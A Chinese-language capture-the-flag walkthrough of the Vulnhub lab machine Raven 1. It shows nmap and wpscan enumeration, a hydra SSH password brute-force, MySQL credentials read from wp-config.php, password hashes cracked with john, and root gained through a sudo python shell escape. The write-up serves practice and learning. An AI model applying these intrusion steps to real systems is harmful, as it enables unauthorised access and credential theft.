Vulnhub靶机之reven 1

一、信息收集

nmap扫描网段,靶机地址为192.168.145.129。

 nmap -sP 192.168.145.*

扫一下端口,开放了22、80、111、50967。

nmap -sT -T4 -p1-65535 192.168.145.129

 再看一下目录情况,发现一个疑似后台登录的地址。

dirsearch -u http://192.168.145.129/

二、flag1

直接访问一下网站。

flag是藏在源码那里的,找了好久,在service页面下的源码里面。

 flag1{b9bbcb33e11b80be759c4e844862482d} 

三、flag2

这个后台登录页面被重定向了,我们需要配置一下,如下添加即可。

vim /etc/hosts

上面我们扫描目录发现有个疑似后台登录的地址,我们访问看看。这个页面再配上url里面包含的wordpress目录,不难判断出它的cms为wordpress。

http://192.168.145.129/wordpress/wp-login.php

有一个专门扫描wordpress的工具叫wpscan,我们直接用它扫一下。

wpscan --url http://192.168.145.129/wordpress -e vp,u  
-e 扫描多个选项
vp 只枚举有漏洞的插件
u  枚举用户名

发现有两个用户名,上面扫描到有开放22端口,那我们直接爆破ssh试试。michael可以爆破出来密码,steven不行。

hydra -l michael  -P passwd.txt ssh://192.168.145.129 -f -e nsr -vV

直接ssh登录上去。

在/var/www也就是网站目录下可以找到flag2。

三、flag3

在/var/www/html/wordpress目录下面找到一个wp-config.php的文件,一般config.php的文件都是配置文件,比如网站配置或者MySQL配置啥的。

打开看看咯,里面有数据库的账号和密码。

连接数据库。

mysql -u root -p

查看数据库。

show databases;

查看表。

show tables;

wp_users估计有东西,直接看看,发现是两个用户的密码。

select * from wp_users;

但是我还发现了wp_posts这张表里面居然有flag3和flag4,哈哈哈。居然可以这样子,不过我还是说一下正常的流程吧。

上面拿到steven用户的哈希值,可以拿去md5网站解密,这里我就用john这个工具爆破一下。把哈希值写入一个passwd.txt文件中,再去爆破即可。

john passwd.txt --wordlist=/usr/share/wordlists/rockyou.txt

这里我之前已经爆破过了,所以我们直接查看即可。

john --show pass.txt

然后登录后台即可拿到flag3,这里我就不再去登录了。

四、flag4

切换到steven用户,输入命令然后输入密码即可。

su steven

查看是否有sudo权限的命令。

sudo -l

发现有个python命令是具有sudo权限的,sudo提权可以看我这篇文章我在这里

sudo  python -c 'import pty;pty.spawn("/bin/bash")'

在root目录下可以看到最后一个flag4

五、总结

这个靶机不算难,挺简单的,这些工具的使用也都是常见的。

最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习

相关推荐

最近更新

  1. TCP协议是安全的吗?

    2024-06-10 08:18:03       16 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-06-10 08:18:03       16 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-06-10 08:18:03       15 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-06-10 08:18:03       18 阅读

热门阅读

  1. React antd 怎么封装枚举字典组件

    2024-06-10 08:18:03       11 阅读
  2. 常用的国内外公共DNS服务

    2024-06-10 08:18:03       8 阅读
  3. JVM详解

    JVM详解

    2024-06-10 08:18:03      8 阅读
  4. OJ3829大石头的搬运工

    2024-06-10 08:18:03       8 阅读
  5. QML键盘事件的用法和示例

    2024-06-10 08:18:03       7 阅读
  6. FastJson

    FastJson

    2024-06-10 08:18:03      10 阅读